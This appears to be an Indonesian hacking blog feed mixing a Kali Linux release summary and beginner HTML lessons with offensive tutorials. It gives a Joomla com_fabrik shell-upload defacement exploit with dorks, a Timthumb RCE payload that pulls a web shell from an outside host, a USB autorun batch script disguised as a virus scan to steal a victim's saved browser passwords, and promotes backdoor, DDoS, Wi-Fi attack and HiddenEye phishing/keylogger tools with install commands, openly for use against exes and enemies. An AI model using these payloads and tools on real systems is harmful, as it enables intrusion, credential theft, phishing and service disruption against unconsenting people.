Kali Linux 2019.4 Rilis - Distribusi Linux Untuk Peretas










   


Wow Kali Linux kali ini sedikit berbeda dan saya senang karna kali linux versi 2019.4 telah rilis.

yap disini ada sedikit update tan dari kali linux 2019.4 apa sih kemajuannya!! :)

  • Lingkukangn Desktop Baru, xfce 
  • Tema GTK3 baru ( Untuk Gnome ataupun Xfce ) 
  • Menambahkan PowerShell 
  • BTRFS selama pengaturan
  • Kali NetHunter keX  - Desktop penuh di android 
  • Pengemaskan publik - memasukan alat anda atau tools anda ke kali
  • Dokumentasi yang didukung oleh Git 
  • Pengenalan mode "Kali Undercover"
  • Ditambahn Perbaikan dan bug normal
Lingkungan Desktop Baru dari dan tema DTK3 

Ada banyak pembaruan yang harus dilakukan untuk rilis ini, tetapi yang paling dalam item wajah Anda yang akan dilihat semua orang adalah perubahan pada lingkungan dan tema desktop. Jadi mari kita bahas itu dulu.
Pembaruan untuk lingkungan desktop telah lama terjadi:


  • Masalah kinerja - Gnome adalah lingkungan desktop berfitur lengkap dengan banyak hal mengagumkan yang dapat dilakukan. Tetapi semua fitur ini dilengkapi dengan overhead, seringkali overhead yang tidak berguna untuk distribusi seperti Kali. Kami ingin mempercepat, dan memiliki lingkungan desktop yang hanya melakukan apa yang diperlukan, dan tidak ada yang lain. Gnome telah berlebihan bagi sebagian besar pengguna Kali, karena banyak yang hanya menginginkan window manager yang memungkinkan Anda untuk menjalankan beberapa terminal terminal sekaligus, dan browser web.
        
  • Pengalaman pengguna yang retak - Kami mendukung berbagai perangkat keras, dari yang sangat tinggi hingga sangat rendah. Karena itu, secara tradisional build ARM kelas bawah kami memiliki UI yang sama sekali berbeda dari standar kami. Itu tidak optimal, dan kami ingin menyatukan pengalaman ini sehingga tidak masalah jika Anda menjalankan instalasi logam kosong pada laptop kelas atas atau menggunakan Raspberry Pi, UI-nya harus sama. 
  •  Tampilan modern - Kami telah menggunakan UI yang sama untuk beberapa waktu sekarang, dan pengelola tema lama kami telah pindah karena kurangnya waktu. Jadi kami ingin pergi dengan sesuatu yang segar, baru, dan modern.
Kali Undercover

Katakanlah Anda bekerja di tempat umum, meretas, dan Anda mungkin tidak ingin naga Kali yang khas untuk semua orang melihat dan bertanya-tanya apa yang sedang Anda lakukan. Jadi, ada skrip kecil baru yang akan mengubah tema Kali Anda agar terlihat seperti instalasi Windows default. Dengan begitu, Anda dapat bekerja dengan penyamaran yang lebih sedikit. Setelah Anda selesai dan di tempat yang lebih pribadi, jalankan kembali skrip dan Anda kembali ke tema Kali Anda. Seperti sihir!
 

 

Tutorial HTML part 2 : Text Editor & cara menjalankan file HTML

Hasil gambar untuk HTMLsetelelah Artikel Pengertian HTML kali ini saya akan melanjutkan di part 2 nya yaitu Text Editor yang tepat unutk belajar HTML dan cara menjalankan file HTML buat nanti kita melihat Output yang keluar

Macam Macam Text Editor 

1. Notepad ++ 
Hasil gambar untuk notepad++

Notepad ++ adalah editor kode sumber gratis (seperti dalam "kebebasan berbicara" dan juga dalam "bir gratis") dan penggantian Notepad yang mendukung beberapa bahasa. Berjalan di lingkungan MS Windows, penggunaannya diatur oleh Lisensi GPL.

(Versi Terbaru) 

2.Sublime Text
Hasil gambar untuk sublime text

ini adalah sebuah tampilan Sublime text apa sih sublime text itu > 
Sublime Text adalah aplikasi editor untuk kode dan teks  yang dapat berjalan diberbagai platform operating system dengan menggunakan teknologi Phyton API. Terciptanya  aplikasi  ini  terinspirasi  dari  aplikasi  Vim,  Aplikasi  ini  sangatlah fleksibel  dan  powerfull.  Fungsionalitas  dari  aplikasi  ini  dapat  dikembangkan dengan  menggunakan  sublime-packages.  Sublime  Text  bukanlah  aplikasi  opensource  dan juga aplikasi yang dapat digunakan dan didapatkan secara gratis,  akan tetapi  beberapa  fitur  pengembangan  fungsionalitas  (packages)  dari  aplikasi  ini merupakan hasil dari temuan dan  mendapat dukungan  penuh dari  komunitas serta memiliki linsensi aplikasi gratis.

3.visual studio code

Hasil gambar untuk visual studio code

oke ini adalah tampilan dari visual studio code apasih visual studio code itu ? 
yap ini adalah salah satu text editor paling populer bagi kalangan programer karena ini adalah salah satu buatan microsoft word.


sebenrnya masih banyak lagim dan coba kalian cari cari di mbah google lainnya :) 
oke langsung aja ke materinya

Menjalankan File HTML

Untuk memudahkan dalam membuka file html, sebagiknya buat sebuah folder "HTML" di drive D. Folder ini akan kita jadikan tempat seluruh pembelajaran kamu.

selanjutnya buka notepad++ atau text editor sesuai anda pilih lalu ketikan text berkikut inii

 Hello World!

save teks seperti diatas lalu simpan dengan nama hello.html pada folder yang buat pembelajaran tadi. setelah itu file hello.html kita double clik atau klik kanan -> lalu pilih open with browser anda...
maka tampilan seperti ini 




nah tampil kan output nya :) nah kaya gitu cara menjalankan file html ya walapun disitu code yang saya berikan belum ada code code tag htmlnya

dari percobaan di atas ini kita dapat melihat bahwa setiap halamn web html harus di akhiri dengan ektensi .html.  anda mungkin juga akan menemukan beberapa halaman dengan ektensi .html, ektensi ini digunakan untuk mendukung windows versi lama yang masih menggunakan ektensi 3 huruf di belakang sebuah file.

oke sekian materi dari saya tentang Tutorial HTML part 2 : Text Editor & cara menjalankan file HTML 
Liat info selanjutnya terimakasih :)



Tutorial HTML part 1 : Pengertian HTML

Gambar terkait
Siapa si yang gak kenal sama bahasa pemrograman HTLM yap HTML adalah kepanjangan dari Hypertext  Markup Language. Disebut hypertext karena di dalam HTML sebuah text bisa dapat berfungsi lain, kita dapat membuatnya menjadi link yang dapat berpindah dari satu halaman kehalaman lainnya hanya dengan meng-klik text tersebut. kemampuan text inilah dinamakan hypertext. walapun pada implemetasinya nanti tidak hanya text yang dapat dijadikan link.

Disebut Markup Language karena bahasa HTML menggunakan tanda (mark), unutk menandai bagian bagian dari tex, misalnya, text yang berada di antara tanda tertentu akan menjadi tebal, dan jika berada di antara tanda lainnya akan tampak besar. Tanda ini dikenal sebagai HTML tag.

jika anda ingin melihat bagaimana sih sbenernya pemrograman HTML, silahkan klik kanan halaman web (web mana aja yang kalian suka) terus pilih opsi View Page Source (di Broser kesayangan kelaen yaa). nah pas udah disitulah anda mengetahui bagaimana keindahannya pemrograman HTML :v

ini contoh gambar nya :


HTML merupakan bahasa dasar pembuatan web. Disebut dasar karena dalam membuat web, jika hanya menggunakan HTML tampilan web terasa hambar. Terdapat banyak bahasa pemrograman web yang ditujukan untuk memanipulasi kode HTML, seperti JavaScript dan PHP. Akan tetapi sebelum anda belajar JavaScript maupun PHP, memahami HTML merupakan hal yang paling awal.

HTML bukanlah bahasa pemrograman (programming language), tetapi bahasa markup (markup language), hal ini terdengar sedikit aneh, tapi jika anda telah mengenal bahasa pemrograman lain, dalam HTML tidak akan ditemukan struktur yang biasa di temukan dalam bahasa pemrograman seperti IF, LOOP, maupun variabelHTML hanya sebuah bahasa struktur yang fungsinya untuk menandai bagian-bagian dari sebuah halaman.
Selain HTML, dikenal juga xHTML yang merupakan singkatan dari eXtensible Hypertext Markup LanguagexHTML merupakan versi lama dari HTML (sebelum era HTML5 seperti saat ini). xHTML menggunakan aturan penulisan yang lebih ketat. Jika anda menemukan artikel yang membahas xHTML, bisa disamakan dengan HTML, karena perbedaannya tidak terlalu banyak.

Versi terbaru HTML: HTML5

Saat ini versi terbaru dari HTML adalah HTML5. HTML5 berisi beberapa fitur baru, tapi tetap membawa mayoritas fitur dari versi HTML sebelumnya, yakni HTML 4 dan xHTML.
File HTML harus dijalankan dari aplikasi web browser. Dalam tutorial belajar HTML dasar selanjutnya, kita akan membahas tentang funsi web browser

Deface Poc Com_fabrik Remote Shell Upload

Baik Kali ini saya akan memberikan tutorial cara men deface suatu web dengan poc Com_fabrik
sebenernya sudah jarang poc ini dipakai akan tetapi masih banyak saja web web yang vuln dengan poc ini tegantung bagaiaman anda mengembangkannya :) oke langsung saja ke tutorialnya

Google Dork : 

inurl:index.php?option=com_fabrik

selebihnya tolong kembangin

Exploit : 
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
exp :
www.apk.co.li/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1



dan disini sudah muncul inputan file , bisa juga upload file ext .php dan bisa juga tidak bisa ;( ya mudah mudahan aja  bisa

jika berhasil Letak Shell kalian ada di > www.apk.co.li/media/shell.php

ya kalau udah tampilan kaya gini mah you know lah :3 tusbol aja lansgung :v

oke segitu saja darisaya kurang lebihnya mohon maaf assalamualaikum wb :)

Deface Poc Timthumb RCE

Asalamualaikum
Oke disini siapa si yang gak kenal sama deface :D yap kali ini gua bakal kasih tutorial ke kalian cara deface metode Timthumb Remote Code Execution 
Ya walapun tegolong poc lama tapi masih banyak loh web web yang vuln poc ini :3 wow enak kan, kalau mau banyak lagi silahkan kembangin dork dorknya pasti bakalan penuh bar browser kalian dengan shell shell :v 
Tapi di poc ini ada juga kekurangan nya yaitu exploit nya hanya bisa digunakan di versi 1.x jadi harus lebih pintar dalam mengembangkan dork nya.
Ini Dork umum bagi saya 

Dork : inurl:timthumb.php?src=

Nah coba kalian kembangin lagi pake intext , intitle, allinurl dll :)

Exploit :

src=http://flickr.com.zafkiel.net/handler.php

Contoh web yang vuln 
langsung aja paste exploitnya :

• http://webtarget.com/timthumb.php?src=http://flickr.com.zafkiel.net/handler.php

Jika berhasil maka tampilannya seperti ini
tinggal akses aja shell kalian, letak shell tertera di Unable to open image : 
Nah contoh nya kaya ginu

https://www.target.co.li/cache/external_cl......php

Ya sesuai path kalian sih itu hanya contoh.

Untuk membuat payload sendiri, subdomain yang dapat digunakan adalah berikut

  'flickr.com'
  'picasa.com'
  'blogger.com'
  'wordpress.com'
  'img.youtube.com'
  'upload.wikimedia.org',
  'photobucket.com',

Oke sekian dan terimakasih semoga bermanfaat


Cara Mencuri Password dengan USB Flashdisk

baik kali ini saya akan mebahas bagaimana cara mencuri password menggunakan flashdisk sesuai dengan judul, saya pernah melakukan sesuatu di komputer milik guru saya dengan membuat suatu program bat yang saya simpan di dalam flashdisk, dan al hasil saya mendapatkan sebuah password yang tersimpan di browsernya dia, oke langsung saja ke pembahasannya

CARA MENCURI PASSWORD MENGGUNAKAN USB FLASHDISK
dari judulnya cukup membuat anda seperti HACKER sungguhan bukan :3 jadi jika kamu lagi kesal dengan temanmu atau dengan musuhmu masukan saja usb ke komputer/laptop nya dia hehe you know lah :p

bahan-bahan yang harus disiapkan :

Langkah-Langkah membuat Pen Drive USB

  1. Hubungkan Flasdisk ke komputer kalian.
  2. Klik Kanan Disk USB > Format > Pilih File System 'NTFS' > Klik Start. Tunggu sampai selesai.Cara Mencuri Password Menggunakan USB Flashdisk
  3. Buatlah Folder dan berinama "USB" (Yang tidak mencurigakan si korban :V)
  4. Ekstrak File "Alat Pencuri Password.zip tadi sudah di download dan letakan di dalam folder USB kamu
  5. Buka Notepad, Copy Paste kode di bawah, Lalu simpan di USB Flasdisk kamu, Beri Nama USB Drive.bat.

@echo off
cls
start \usb\WebBrowserPassView.exe /shtml 1.html

 6. Buka Notepad Lagi Copy Paste Lagi kode berikut di folder USB kamu, dan beri nama Autorun.inf


[autorun]
open=usbdriver.bat
Action=Perform a virus Scan

Cara Mencuri Password Menggunakan USB Flashdisk

So semua bahann sudah kita persiapkan dan usb sudah dapat mencuri password di komputer korban.

Oke Gimana cara eksekusi nya

CARA EKSEKUSI MENCURI PASSWORD

Sekarang kita ke tahap dimana kita mengeksekusi rencana jahat kita ini, dan persyaratan anda harus sudah menghubungakn flasdisk/USB anda ke komputer target atau laptop target...ikuti cara caranya

1. Colokan USB ke PC atau Komptrer/laptop.
2. Jika Komptrer/PC/Laptop ada antivirusnya, ikuti saya apa yang antivirus itu terima, biasanya kamu cukup milih opsi "YES" saja
3. Akan muncul sebuah jendela pop-up yang menampilkan semua history password  yang tersimpan, Pilih  semua atau tekan CTRL+A lalu simpan dengan cara tekan CTRL+S,  simpanlah ke dalam USB kamu.
4. Cabut USB tersebut, Buka file yang kamu baru saja kamu simpan, dan alamt, semua password sudah kamu  dapatkan.

!!Untuk  beberapa komputer atau OS, Autorun tidak akan berjalan otomatis, Jika hal tersebut terjadi, kamu harus menjalankan file Autorun secara manual dengan cara Klik 2 kali atau Run As Administrator. 

CARA MENCEGAH MENCURIAN PASSWORD

Tindakan Pencurian password menggunakan flashdisk ataupun dengan cara apapun sebenernya bisa kita atasi dengan mudah, Tapi, Hal Tersebut yang sering kita sepelekan.

Caranya cukup mudah, Cukup tidak menyimpan password cookies dan history pada browser setiap login atau sign up di sebuah website manapun.

bisa juga dengan cara membersihkan ceche, cookies dan history setelah melakukan kegiatan browsing.

Oke Cukup sampe disni saja pembahasan kali ini semoga bermanfaat.

Daftar Alat Injeksi SQL Terbaik

Hasil gambar untuk SQL INJECTION 
Injeksi SQL / SQL INJECTION adalah salah satu serangan paling umum terhadap aplikasi web. Serangan injeksi SQL terdiri dari penyisipan atau "injeksi" dari permintaan SQL melalui input data dari klien ke aplikasi. Eksploit injeksi SQL yang berhasil dapat membaca data sensitif dari basis data, memodifikasi data basis data (Masukkan / Perbarui / Hapus), jalankan operasi administrasi pada basis data (seperti mematikan DBMS), memulihkan konten dari file yang diberikan saat ini pada file DBMS sistem dan dalam beberapa kasus mengeluarkan perintah ke sistem operasi.

Serangan injeksi SQL yang berhasil dapat membaca data server sensitif seperti kata sandi, email, nama pengguna, dll. Injeksi SQL bisa sangat berbahaya.

Ini adalah daftar alat injeksi SQL terbaik dan paling populer:


  • SQLMap - Alat Injeksi SQL Otomatis Dan Pengambilan Basis Data
  • jSQL Injection - Alat Java Untuk Injeksi Database SQL Otomatis
  • BBQSQL - Alat Eksploitasi Injeksi SQL Buta
  • NoSQLMap - Pwnage Database NoSQL Otomatis
  • Whitewidow - Pemindai Kerentanan SQL
  • DSSS - Damn Small SQLi Scanner
  • exploit - Format Pengujian Kerentanan Web Yang Dapat Dibaca Manusia Dan Mesin
  • Blind-Sql-Bitshifting - Blind SQL Injection melalui Bitshifting
  • Leviathan - Perangkat Mass Audit Wide Range
  • Blisqy - Eksploitasi injeksi blind-SQL berbasis waktu di HTTP-Header (MySQL / MariaDB)

jSQL Injection v0.73 - Java Tool For Automatic SQL Database Injection

Hasil gambar untuk jSQL 
jSQL Injection adalah aplikasi ringan yang digunakan untuk mencari informasi basis data dari server yang jauh.

jSQL gratis, sumber terbuka, dan lintas platform (Windows, Linux, Mac OS X, Solaris).

jSQL adalah bagian dari Kali Linux, distribusi penetrasi BackTrack resmi baru.

jSQL juga termasuk dalam Black Hat Sec, ArchAssault Project, BlackArch Linux dan Cyborg Hawk Linux.



TheFatRat - Alat Mudah Untuk Menghasilkan Backdoor dengan Msfvenom

Hasil gambar untuk THE FAT RAT HACKING

Buat para kalian yang heker black hat :V ada tools yang paling membantu buat hek hp mantan sama hek hp musuh :3 hooh ini tools bantuan dari metaspoit apa lagi kalau buka TheFatRat

TheFatRat ini Alat yang mudah untuk menghasilkan backdoor dengan msfvenom (bagian dari kerangka kerja metasploit) dan program mengkompilasi program C dengan meterpreter reverse_tcp payload Di dalamnya yang kemudian dapat dieksekusi pada windows host Program untuk membuat program C setelah dikompilasi yang akan mem-bypass sebagian besar AV
Mengotomatiskan fungsi metasploit
  •      Memeriksa layanan metasploit dan mulai jika tidak ada
  •      Mudah membuat muatan meter_teter reverse_tcp untuk Windows, Linux, Android dan Mac dan lainnya
  •      Mulai beberapa meter reverse_tcp listners
  •      Pencarian Cepat di searchsploit
  •      Lewati AV
  •      Jatuhkan ke Msfconsole
  •      Beberapa hal menyenangkan lainnya :)
Mulai
Bagaimana itu bekerja

     Ekstrak lalin-master ke rumah Anda atau folder lain
     chmod + x fatrat
     chmod + x powerfull.sh
     Dan jalankan alat (./fatrat)
     Mudah Digunakan, cukup masukkan nomor Anda


❗ Persyaratan

     Sistem operasi linux. Kami merekomendasikan Kali Linux 2 atau Kali 2016.1 bergulir / Cyborg / Parrot / Dracos / BackTrack / Backbox / dan sistem operasi lain (linux)
     Harus menginstal kerangka kerja metasploit
     diperlukan program gcc, i586-mingw32msvc-gcc atau i686-w64-mingw32-gcc (apt-get install mingw32) untuk memperbaiki kesalahan
Screenshots
  
 
 

Java LOIC - Alat DDOS paling ampuh untuk take down musuh!!!

Hasil gambar untuk Java LOIC 
Hallo para DDOS lovers Oke kali ini gua bakal share ke kalian tools paling ampuh untuk men take down musuh atau target kalian, apalagi attack secara bersamaan wuduh bakalan cepet down tuh server ya apa lagi kalau bukan alat JAVA LOIC
 
Biasa di sebuat Meriam Ion Orbit Rendah. Proyek ini adalah implementasi Java dari LOIC yang ditulis oleh Praetox tetapi tidak terkait dengan proyek asli. Tujuan utama Java LOIC adalah menguji jaringan Anda.

Java LOIC harus bekerja pada sebagian besar sistem operasi.


Ehtools - Tools Penetrasi Wi-Fi



 DOWNLOAD EHTOOLS


Yap oke kali ini gua bakal coba share ke kalian tentang tools yang satu ini yaitu tools untuk Penetrasi Wi-Fi :3 oke apa sih tools nya yaitu Ehtool dan apakah Ehtool itu

Wi-Fi Tools terus semakin mudah diakses oleh pemula, dan Kerangka Kerja 
Ehtools adalah kerangka kerja alat penetrasi serius yang dapat dieksplorasi dengan mudah dari dalamnya. Alat yang ampuh dan sederhana ini dapat digunakan untuk semuanya mulai dari memasang add-on baru hingga meraih jabat tangan WPA dalam hitungan detik. Plus, mudah untuk menginstal, mengatur, dan memanfaatkan.

langkah langkah install tools Ehtools
cd ehtools
chmod +x install.sh
./install.sh



Memilih versi kerangka kerja
 
INFO: Setelah menjalankan install.sh, Anda akan diminta untuk memilih versi Kerangka Ehtools - PRO os LITE. Pilih LITE jika Anda tidak membeli Ehtools Framework PRO. Jika Anda membeli Ehtools Framework PRO, pilih PRO.


./install.sh

 Versi Kerangka Ehtools apa yang ingin Anda instal? (Pro / lite):
Jika Anda tidak membeli Ehtools Framework PRO, pilih LITE!
Jika Anda membeli Ehtools Framework PRO, pilih PRO!
(versi)>
Jika Anda memilih Ehtools Framework PRO, Anda harus mengaktifkannya dengan Kunci Aktivasi Ehtools yang harus Anda beli di situs ehtools. Jika Anda memiliki Kunci Aktivasi Ehtools, baca instruksi berikut.


Bagaimana cara mengaktifkan ehtools PRO
Kunci ini dapat Anda beli di situs ehtools dengan harga satu dolar! Kunci ini digunakan untuk mengaktifkan ehtools PRO, memasukkannya di bidang input dari kunci aktivasi di file install.sh dan kemudian Anda dapat menginstal ehtools dan menggunakannya hanya untuk tujuan pendidikan!

PERINGATAN: Kunci hanya berfungsi satu minggu kemudian itu berubah!
Anda harus punya waktu untuk memasukkannya sebelum diperbarui!
 


 ./install.sh

Masukkan kunci aktivasi ehtools Anda! Anda dapat membelinya di situs ehtools!

(activation_key)> 

Juga, kami tidak menyarankan untuk mengubah kode sumber ehtools karena sangat kompleks dan Anda dapat mengacaukan sesuatu dan mengganggu kerangka kerja!
PERINGATAN: Kami tidak menyarankan untuk mengubah kode sumber ehtools
karena Anda dapat mengganggu kerangka kerja!
 


Cara Menghapus Instalasi Ehtools |
ehtools -r

PERINGATAN: Jangan lakukan itu jika Anda ingin menginstal ulang
ehtools PRO yang Anda beli, jangan lakukan itu karena
Anda harus membelinya sekali lagi!
 
 


Kerangka kerja menyerang
Sebagian besar alat peretasan Wi-Fi baru mengandalkan banyak serangan mendasar yang sama, dan skrip yang diotomatisasi menggunakan alat lain yang lebih dikenal seperti Aireplay-ng sering disebut sebagai kerangka kerja. Kerangka kerja ini mencoba mengatur alat dengan cara yang cerdas atau berguna untuk mengambilnya selangkah di luar fungsi atau kegunaan dari program asli.
Contoh yang sangat baik dari ini adalah program yang mengintegrasikan alat pemindaian seperti Airodump-ng, serangan seperti WPS Pixie-Dust, dan alat cracking seperti Aircrack-ng untuk membuat rantai serangan yang mudah diikuti untuk pemula. Melakukan hal ini membuat proses menggunakan alat-alat ini lebih mudah diingat dan dapat dilihat sebagai semacam tur berpemandu. Sementara masing-masing serangan ini dimungkinkan tanpa berpegangan tangan, hasilnya bisa lebih cepat atau lebih nyaman daripada mencoba melakukannya sendiri.
Contoh dari hal ini yang telah kami bahas adalah Airgeddonframework, kerangka kerja serangan nirkabel yang melakukan hal-hal berguna seperti mengotomatiskan proses pemilihan target dan menghilangkan waktu yang dihabiskan pengguna untuk menyalin dan menempel informasi di antara program. Ini menghemat waktu yang berharga bahkan untuk pentester berpengalaman tetapi memiliki kelemahan mencegah pemula dari memahami apa yang terjadi "di balik tudung" serangan. Meskipun ini benar, sebagian besar kerangka kerja ini cepat, efisien, dan mudah digunakan, memungkinkan bahkan pemula untuk mengambil dan menonaktifkan seluruh jaringan.

UX / UI impruments untuk pemula
Kerangka kerja Ehtools dimulai dengan hanya mengetikkan huruf ehtools atau eht ke jendela terminal, kemudian ia meminta nama antarmuka jaringan Anda setelah dijalankan pertama kali. Itu menggunakan nama yang Anda berikan untuk terhubung ke alat yang diperlukan untuk melakukan serangan yang Anda pilih. Selain dari input awal itu, sebagian besar serangan yang mungkin dapat dilakukan hanya dengan memilih nomor opsi dari menu. Ini berarti Anda dapat mengambil jabat tangan jaringan atau mengunduh alat peretasan baru seperti Pupy dengan hanya memilih dari salah satu opsi menu.

Gunakan alat jaringan dasar
Untuk memulai, kita dapat mengakses data tentang jaringan yang saat ini terhubung, serta semua antarmuka jaringan, dari menu utama. Di sini, kita dapat menemukan informasi lokal dengan mengetik l untuk mendapatkan informasi IP lokal, seperti yang terlihat di bawah ini.
Ini memungkinkan kami melakukan hal-hal seperti memindai jaringan untuk perangkat lain. Bagian dari Kerangka Kerja Ehtools ini memberi kita visibilitas yang lebih baik pada jaringan dan kesadaran situasional tentang perangkat apa yang ada di sekitar kita. Berbagai informasi dapat dirinci sebagai berikut:
 


(ehtools)> if
NFO: Menjalankan ifconfig dan memberikan nama dan informasi tentang semua perangkat jaringan.

(ehtools)> 1
NFO: Aktifkan wlan0.
(d1 menonaktifkannya)


(ehtools)> 2
NFO: Aktifkan wlan0mon.
(d2 menonaktifkannya)


(ehtools)> 3
INFO: Acak atau atur alamat MAC ke nilai tertentu.

(ehtools)> 7

INFO: Lihat alamat IP publik yang ditinggalkan komputer Anda di situs yang Anda kunjungi.

(ehtools)> 19

INFO: Cari alamat fisik dari alamat IP yang diberikan untuk menentukan lokasi relatifnya.

(ehtools)> scan

INFO: Mulai pemindaian ARP di jaringan untuk menemukan perangkat terdekat.

(ehtools)> start

INFO: Hentikan mode monitor nirkabel pada adaptor jaringan.

(ehtools)> stop

INFO: Hentikan mode monitor nirkabel pada adaptor jaringan.   









HACKUNA - Aplikasi Scanner Untuk Melacak Hacker

Hasil gambar untuk HACKUNA 

DOWNLOAD HACKUNA

HACKUNA siapa sih yang gak kenal sama aplikasi yang satu ini, yaa itulah HACKUNA apllikasi ini sangat berguna bagi kemanan jaringan kita ketika ada orang ketiga di jaringan kita atau biasa yang di sebut Man In The Middle (MITM) adalah suatu aktivitas hacker untuk memata-matai atau menyadap komunikasi data rahasia, seperti yang sniffing,Sniffing bisa disebut sebagai passive attack karena pada sniffing attacker tidak melakukan tindakan  apa-apa selain memantau data yang lewat.  Memang benar dengan serangan mitm, seorang attacker bisa mengetahui apa yang dibicarakan oleh dua pihak yang berkomunikasi. Namun sebenarnya kekuatan terbesar dari mitm bukan pada kemampuan sniffingnya, namun pada kemampuan mencegat dan mengubah komunikasi sehingga mitm attack bisa disebut sebagai jenis serangan aktif.
seperti gambar di bawah cara si hacker melakukan aktivitasnya
 Hasil gambar untuk Man In Middle Attack
nah bahaya kan :( maka dibuatlah aplikasi HACKUNA ini   untuk mencegah serangan MITM ini
aplikasi ini dibuat oleh sebuah perusahaan yaitu Cryptors.

Cryptors, sebuah perusahaan keamanan siber, menciptakan sebuah aplikasi seluler bernama HACKUNA (Anti-Hack) yang dapat memblokir dan mendeteksi peretas WiFi ini. Bagian yang menarik di sini adalah, Anda juga dapat melacak peretas di dalam area tersebut. Ini akan memberi Anda semua detail yang Anda butuhkan untuk menemukan peretas di dalam area tersebut atau melaporkannya ke pihak yang berwenang. Kami sekarang diberi kekuatan untuk melawan peretas WiFi.

Apakah Anda sering terhubung ke WiFi Gratis Umum?
Studi mengatakan bahwa seorang peretas dapat meretas akun online Anda dalam setidaknya 60 detik, hanya karena Anda terhubung ke WiFi Gratis Publik ...
Para ahli mengatakan bahwa hal terbaik yang harus dilakukan untuk mengamankan diri Anda dari ini, adalah membuang penggunaan WiFi gratis publik. Menyebalkan sekali kan? Tapi tidak lagi!


Bukti Aplikasi Ini WORKK!!!! 100%

Hackuna vs The common WiFi Hacking Tools

Hackuna vs WiFi Kill Pro

HiddenEye - Alat Phishing Modern Dengan Fungsi Canggih (Tersedia Dukungan Android)

Alat Phishing Modern Dengan Fungsi Canggih

PHISHING | KEYLOGGER | INFORMATION_COLLECTOR | ALL_IN_ONE_TOOL | REKAYASA SOSIAL
 

SCREENSHOT TERMUX 

 

Device Tested: -
  •      Kali Linux - Edisi Bergulir
  •      Parrot OS - Edisi Bergulir
  •      Linux Mint - 18,3 Sylvia
  •      Ubuntu - 16.04.3 LTS
  •      MacOS High Sierra
  •      Arch Linux
  •      Manjaro XFCE Edisi 17.1.12
  •      Lengkungan Hitam
  •      Aplikasi Userland / Termux (Untuk Pengguna Android)
sebelum menjalankan tools haru install ini terlebih dahulu : 
     
  • Python3 
  • Wget from Python
  • PHP
  • Sudo
JIKA ADA BUG / PUNYA MASALAH APA AJA (BACA INI) : 
  • Periksa masalah / bug yang ditutup & dipecahkan sebelum membuka yang baru.
  • Pastikan masalah Anda terkait dengan kode dan sumber daya repositori ini.
  • Merupakan tanggung jawab Anda untuk merespons masalah-masalah yang Anda buka.
  • Jika kami tidak menemukan respons pengguna pada masalahnya dalam interval waktu tertentu, Maka kami harus menutup masalah itu.
  • Jangan Spam atau Mengiklankan & Menghargai Semua Orang.
    Dan Banyak Loh Fitur Fitur Dari Tools ini > dan yang lebih menyenangkan lagi ada fitur barunya ^_^ seperti : 

1) SERANGAN LANGSUNG 
  •      Sekarang Anda akan memiliki informasi langsung tentang para korban seperti: IP ALAMAT, Geolokasi, ISP, Negara, & banyak lagi.
2) KOMPATIBILITAS 
  •         Semua situs kompatibel dengan seluler.
 3) KEYLOGGER 
  •      Sekarang Anda juga akan memiliki kemampuan untuk menangkap semua kunci korban.
  •      Anda sekarang dapat menggunakan opsi Keyloggers With (Y / N).
  •      Masalah besar telah diperbaiki.
 4) DUKUNGAN ANDROID
  •      Kami peduli dengan Pengguna Android, Jadi sekarang kami telah datang dengan dua cara untuk menjalankan HiddenEye di Perangkat Android. 
(A) Aplikasi UserLand
  •      Anda Harus Mengunduh Aplikasi UserLand. Klik Di Sini Untuk Mengunduhnya.
  •      Untuk membaca lebih lanjut cara mengatur aplikasi userland, Baca DI SINI
 (B) Aplikasi Termux 
  •  Anda Harus Mengunduh Aplikasi Termux. Klik Di Sini Untuk Mengunduhnya.
  • Untuk instruksi lebih lanjut, Periksa Instruksi
  • Pengguna Termux Mengkloning Dengan Perintah Ini, Kecuali Kesalahan dapat terjadi selama Berjalan. 
USAGE TERMUX

root@darkclownsec~:#git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git
root@darkclownsec~:# pkg install git python php curl openssh grep
root@darkclownsec~:# pip3 install wget
root@darkclownsec~:# chmod 777 HiddenEye
root@darkclownsec~:# cd HiddenEye
root@darkclownsec~:# python HiddenEye.py
or
root@darkclownsec~:#./HiddenEye.py

5) LOOK BARU DISEDIAKA
  • SEKARANG FOKUS DENGAN MUDAH TUGAS ...
  • MENYESUAIKAN APLIKASI DENGAN TEMA ANDA SENDIRI

6) SELEKSI TYPE URL SERVEO TERSEDIA SEKARANG
  • Masalah utama dengan servis diperbaiki.
  • Sekarang Anda dapat memilih dari URL KUSTOM dan URL ACAK.

7) KOLEKSI BESAR PAGI PHISHING TAMBAH
  • Halaman diambil dari berbagai alat termasuk ShellPhish, Blackeye, SocialFish. 
 UNTUK PROSEDUR INSTALASI LEBIH LANJUT - (PERIKSA INSTRUKSI)

INDEX Phising Yang Tersedia!!!!!!!!!!

1) Facebook:
  • Halaman login Facebook tradisional.
  • Metode Polling Tingkat Lanjut.
  • Login Keamanan Palsu dengan Halaman Facebook.
  • Halaman login messenger Facebook.
2) Google:  
  • Halaman login Google tradisional.
  • Metode Polling Tingkat Lanjut.
  • Halaman Google Baru.
3) LinkedIn:
  • Halaman login LinkedIn tradisional.
4) Github:
  • Halaman login Github tradisional.
5) Stackoverflow:
  •  Halaman login Stackoverflow tradisional.
6) Wordpress:
  • Halaman login Wordpress serupa.
7) Twitter:
  • Halaman login Twitter tradisional.
8) Instagram:
  • Halaman login Instagram tradisional.
  • Instagram Autoliker Phishing Page.
  • Skenario Profil Instagram Serangan lanjutan.
  • Lencana Verifikasi Serangan Instagram [Baru]
  • Instagram Phishing AutoFollower Halaman oleh (https://github.com/thelinuxchoice)
9) SNAPCHAT PHISHING:
  • Halaman Login Snapchat Tradisional
10) YAHOO PHISHING:
  •  Halaman Login Yahoo Tradisional
11) PENCARIAN TWITCH: 
  • Halaman Masuk Traditional Twitch [Login Dengan Facebook Juga Tersedia]
12) MICROSOFT PHISHING:
  • Halaman Login Tradisional Microsoft-Live
13) STEAM PHISHING:
  • Halaman Login Steam Tradisional
14) VK PHISHING:
  •  Halaman Login Web VK Tradisional
  • Metode Polling Tingkat Lanjut
15) PHLOING ICLOUD:
  • Halaman Login Web iCloud Tradisional
16) GitLab PHISHING:
  •  Halaman Login GitLab Tradisional
17) PEMESANAN NetFlix:
  • Halaman Login Netflix Tradisional
18) Asal PHISHING:
  • Halaman Login Asal Tradisional
19) Pinterest PHISHING:
  •  Halaman Login Pinterest Tradisional
20) Protonmail PHISHING:
  • Halaman Login Protonmail Tradisional
21) Spotify PHISHING:
  •  Halaman Login Spotify Tradisional
